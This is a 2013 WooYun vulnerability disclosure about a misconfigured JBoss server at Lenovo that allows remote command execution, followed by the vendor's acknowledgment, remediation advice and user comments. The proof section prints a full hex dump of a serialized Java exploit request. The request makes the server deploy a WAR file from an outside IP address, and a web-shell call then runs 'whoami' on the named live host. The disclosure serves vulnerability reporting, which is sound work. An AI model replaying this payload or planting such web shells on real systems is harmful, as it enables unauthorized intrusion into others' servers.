当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039516

漏洞标题:联想某服务器中间件JBOSS配置不当 可命令执行

相关厂商:联想

漏洞作者: 猪猪侠

提交时间:2013-10-12 17:22

修复时间:2013-11-26 17:23

公开时间:2013-11-26 17:23

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-12: 细节已通知厂商并且等待厂商处理中
2013-10-13: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向核心白帽子及相关领域专家公开
2013-11-02: 细节向普通白帽子公开
2013-11-12: 细节向实习白帽子公开
2013-11-26: 细节向公众公开

简要描述:

服务器JBOSS中间件配置做了一些安全配置,但还是没有防御到位,可命令执行。

详细说明:

#1 漏洞细节
http://www.exploit-db.com/exploits/28713/
#2 受影响服务器
http://appwiz.lenovo.net

漏洞证明:

PS E:\AppServ\php5> .\php.exe .\jboss.php appwiz.lenovo.net whoami
PHP Warning:  Module 'mbstring' already loaded in Unknown on line 0
     0 : 50 4f 53 54 20 2f 69 6e 76 6f 6b 65 72 2f 45 4a [POST /invoker/EJ]
    10 : 42 49 6e 76 6f 6b 65 72 53 65 72 76 6c 65 74 2f [BInvokerServlet/]
    20 : 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 74 65 [ HTTP/1.1..Conte]
    30 : 6e 74 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [ntType: applicat]
    40 : 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 61 [ion/x-java-seria]
    50 : 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 6c [lized-object; cl]
    60 : 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [ass=org.jboss.in]
    70 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
    80 : 6c 65 64 49 6e 76 6f 63 61 74 69 6f 6e 0d 0a 41 [ledInvocation..A]
    90 : 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 [ccept-Encoding: ]
    A0 : 78 2d 67 7a 69 70 2c 78 2d 64 65 66 6c 61 74 65 [x-gzip,x-deflate]
    B0 : 2c 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 55 [,gzip,deflate..U]
    C0 : 73 65 72 2d 41 67 65 6e 74 3a 20 4a 61 76 61 2f [ser-Agent: Java/]
    D0 : 31 2e 36 2e 30 5f 32 31 0d 0a 48 6f 73 74 3a 20 [1.6.0_21..Host: ]
    E0 : 61 70 70 77 69 7a 2e 6c 65 6e 6f 76 6f 2e 6e 65 [appwiz.lenovo.ne]
    F0 : 74 3a 38 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 [t:80..Accept: te]
   100 : 78 74 2f 68 74 6d 6c 2c 20 69 6d 61 67 65 2f 67 [xt/html, image/g]
   110 : 69 66 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 [if, image/jpeg, ]
   120 : 2a 3b 20 71 3d 2e 32 2c 20 2a 2f 2a 3b 20 71 3d [*; q=.2, */*; q=]
   130 : 2e 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 [.2..Connection: ]
   140 : 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 43 6f 6e 74 [keep-alive..Cont]
   150 : 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 [ent-type: applic]
   160 : 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d [ation/x-www-form]
   170 : 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 43 6f 6e [-urlencoded..Con]
   180 : 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 33 32 [tent-Length: 732]
   190 : 0d 0a 0d 0a ac ed 00 05 73 72 00 29 6f 72 67 2e [........sr.)org.]
   1A0 : 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e [jboss.invocation]
   1B0 : 2e 4d 61 72 73 68 61 6c 6c 65 64 49 6e 76 6f 63 [.MarshalledInvoc]
   1C0 : 61 74 69 6f 6e f6 06 95 27 41 3e a4 be 0c 00 00 [ation...'A>.....]
   1D0 : 78 70 70 77 08 78 94 98 47 c1 d0 53 87 73 72 00 [xppw.x..G..S.sr.]
   1E0 : 11 6a 61 76 61 2e 6c 61 6e 67 2e 49 6e 74 65 67 [.java.lang.Integ]
   1F0 : 65 72 12 e2 a0 a4 f7 81 87 38 02 00 01 49 00 05 [er.......8...I..]
   200 : 76 61 6c 75 65 78 72 00 10 6a 61 76 61 2e 6c 61 [valuexr..java.la]
   210 : 6e 67 2e 4e 75 6d 62 65 72 86 ac 95 1d 0b 94 e0 [ng.Number.......]
   220 : 8b 02 00 00 78 70 26 95 be 0a 73 72 00 24 6f 72 [....xp&...sr.$or]
   230 : 67 2e 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 [g.jboss.invocati]
   240 : 6f 6e 2e 4d 61 72 73 68 61 6c 6c 65 64 56 61 6c [on.MarshalledVal]
   250 : 75 65 ea cc e0 d1 f4 4a d0 99 0c 00 00 78 70 77 [ue.....J.....xpw]
   260 : f0 00 00 00 e8 ac ed 00 05 75 72 00 13 5b 4c 6a [.........ur..[Lj]
   270 : 61 76 61 2e 6c 61 6e 67 2e 4f 62 6a 65 63 74 3b [ava.lang.Object;]
   280 : 90 ce 58 9f 10 73 29 6c 02 00 00 78 70 00 00 00 [..X..s)l...xp...]
   290 : 04 73 72 00 1b 6a 61 76 61 78 2e 6d 61 6e 61 67 [.sr..javax.manag]
   2A0 : 65 6d 65 6e 74 2e 4f 62 6a 65 63 74 4e 61 6d 65 [ement.ObjectName]
   2B0 : 0f 03 a7 1b eb 6d 15 cf 03 00 00 78 70 74 00 21 [.....m.....xpt.!]
   2C0 : 6a 62 6f 73 73 2e 73 79 73 74 65 6d 3a 73 65 72 [jboss.system:ser]
   2D0 : 76 69 63 65 3d 4d 61 69 6e 44 65 70 6c 6f 79 65 [vice=MainDeploye]
   2E0 : 72 78 74 00 06 64 65 70 6c 6f 79 75 71 00 7e 00 [rxt..deployuq.~.]
   2F0 : 00 00 00 00 01 74 00 1a 68 74 74 70 3a 2f 2f 35 [.....t..http://5]
   300 : 39 2e 33 39 2e 37 31 2e 32 30 37 2f 61 2e 77 61 [9.39.71.207/a.wa]
   310 : 72 3f 75 72 00 13 5b 4c 6a 61 76 61 2e 6c 61 6e [r?ur..[Ljava.lan]
   320 : 67 2e 53 74 72 69 6e 67 3b ad d2 56 e7 e9 1d 7b [g.String;..V...{]
   330 : 47 02 00 00 78 70 00 00 00 01 74 00 10 6a 61 76 [G...xp....t..jav]
   340 : 61 2e 6c 61 6e 67 2e 53 74 72 69 6e 67 0d d3 be [a.lang.String...]
   350 : c9 78 77 04 00 00 00 01 73 72 00 22 6f 72 67 2e [.xw.....sr."org.]
   360 : 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e [jboss.invocation]
   370 : 2e 49 6e 76 6f 63 61 74 69 6f 6e 4b 65 79 b8 fb [.InvocationKey..]
   380 : 72 84 d7 93 85 f9 02 00 01 49 00 07 6f 72 64 69 [r........I..ordi]
   390 : 6e 61 6c 78 70 00 00 00 05 73 71 00 7e 00 05 77 [nalxp....sq.~..w]
   3A0 : 0d 00 00 00 05 ac ed 00 05 70 fb 57 a7 aa 78 77 [.........p.W..xw]
   3B0 : 04 00 00 00 03 73 71 00 7e 00 07 00 00 00 04 73 [.....sq.~......s]
   3C0 : 72 00 23 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e 76 [r.#org.jboss.inv]
   3D0 : 6f 63 61 74 69 6f 6e 2e 49 6e 76 6f 63 61 74 69 [ocation.Invocati]
   3E0 : 6f 6e 54 79 70 65 59 a7 3a 1c a5 2b 7c bf 02 00 [onTypeY.:..+|...]
   3F0 : 01 49 00 07 6f 72 64 69 6e 61 6c 78 70 00 00 00 [.I..ordinalxp...]
   400 : 01 73 71 00 7e 00 07 00 00 00 0a 70 74 00 0f 4a [.sq.~......pt..J]
   410 : 4d 58 5f 4f 42 4a 45 43 54 5f 4e 41 4d 45 73 72 [MX_OBJECT_NAMEsr]
   420 : 00 1b 6a 61 76 61 78 2e 6d 61 6e 61 67 65 6d 65 [..javax.manageme]
   430 : 6e 74 2e 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 a7 [nt.ObjectName...]
   440 : 1b eb 6d 15 cf 03 00 00 78 70 74 00 21 6a 62 6f [..m.....xpt.!jbo]
   450 : 73 73 2e 73 79 73 74 65 6d 3a 73 65 72 76 69 63 [ss.system:servic]
   460 : 65 3d 4d 61 69 6e 44 65 70 6c 6f 79 65 72 78 78 [e=MainDeployerxx]
     0 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d [HTTP/1.1 200 OK.]
    10 : 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2d [.Server: Apache-]
    20 : 43 6f 79 6f 74 65 2f 31 2e 31 0d 0a 58 2d 50 6f [Coyote/1.1..X-Po]
    30 : 77 65 72 65 64 2d 42 79 3a 20 53 65 72 76 6c 65 [wered-By: Servle]
    40 : 74 20 32 2e 34 3b 20 4a 42 6f 73 73 2d 34 2e 32 [t 2.4; JBoss-4.2]
    50 : 2e 33 2e 47 41 20 28 62 75 69 6c 64 3a 20 53 56 [.3.GA (build: SV]
    60 : 4e 54 61 67 3d 4a 42 6f 73 73 5f 34 5f 32 5f 33 [NTag=JBoss_4_2_3]
    70 : 5f 47 41 20 64 61 74 65 3d 32 30 30 38 30 37 31 [_GA date=2008071]
    80 : 38 31 34 31 37 29 2f 4a 42 6f 73 73 57 65 62 2d [81417)/JBossWeb-]
    90 : 32 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 [2.0..Content-Typ]
    A0 : 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [e: application/x]
    B0 : 2d 6a 61 76 61 2d 73 65 72 69 61 6c 69 7a 65 64 [-java-serialized]
    C0 : 2d 6f 62 6a 65 63 74 3b 20 63 6c 61 73 73 3d 6f [-object; class=o]
    D0 : 72 67 2e 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 [rg.jboss.invocat]
    E0 : 69 6f 6e 2e 4d 61 72 73 68 61 6c 6c 65 64 56 61 [ion.MarshalledVa]
    F0 : 6c 75 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e [lue..Transfer-En]
   100 : 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d [coding: chunked.]
   110 : 0a 44 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f [.Date: Sat, 12 O]
   120 : 63 74 20 32 30 31 33 20 30 39 3a 31 38 3a 32 33 [ct 2013 09:18:23]
   130 : 20 47 4d 54 0d 0a 0d 0a 34 39 0d 0a ac ed 00 05 [ GMT....49......]
   140 : 73 72 00 24 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [sr.$org.jboss.in]
   150 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
   160 : 6c 65 64 56 61 6c 75 65 ea cc e0 d1 f4 4a d0 99 [ledValue.....J..]
   170 : 0c 00 00 78 70 77 0d 00 00 00 05 ac ed 00 05 70 [...xpw.........p]
   180 : fb 57 a7 aa 78 0d 0a 30 0d 0a 0d 0a [.W..x..0....]
     0 : 47 45 54 20 2f 61 2f 70 77 6e 2e 6a 73 70 3f 63 [GET /a/pwn.jsp?c]
    10 : 6d 64 3d 77 68 6f 61 6d 69 20 48 54 54 50 2f 31 [md=whoami HTTP/1]
    20 : 2e 30 0d 0a 48 6f 73 74 3a 20 61 70 70 77 69 7a [.0..Host: appwiz]
    30 : 2e 6c 65 6e 6f 76 6f 2e 6e 65 74 3a 38 30 0d 0a [.lenovo.net:80..]
    40 : 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 [Connection: Clos]
    50 : 65 0d 0a 0d 0a [e....]
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
Set-Cookie: JSESSIONID=07624BA22D6770CA7D1B2E2682BC9F30; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33
Date: Sat, 12 Oct 2013 09:18:33 GMT
Connection: close
lenovo-magic2\administrator

修复方案:

# 删除接口
# 设置中间件的访问控制权限,禁止web访问 /invoker 目录

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-10-13 21:13

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-12 17:26 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    这就来了?

  2. 2013-10-12 20:07 | Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)

    刷分的节奏。。。。

  3. 2013-10-12 22:49 | M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)

    坐等大波

  4. 2013-10-13 18:17 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    EXP还没出来么

  5. 2013-10-13 19:27 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

    一大波漏洞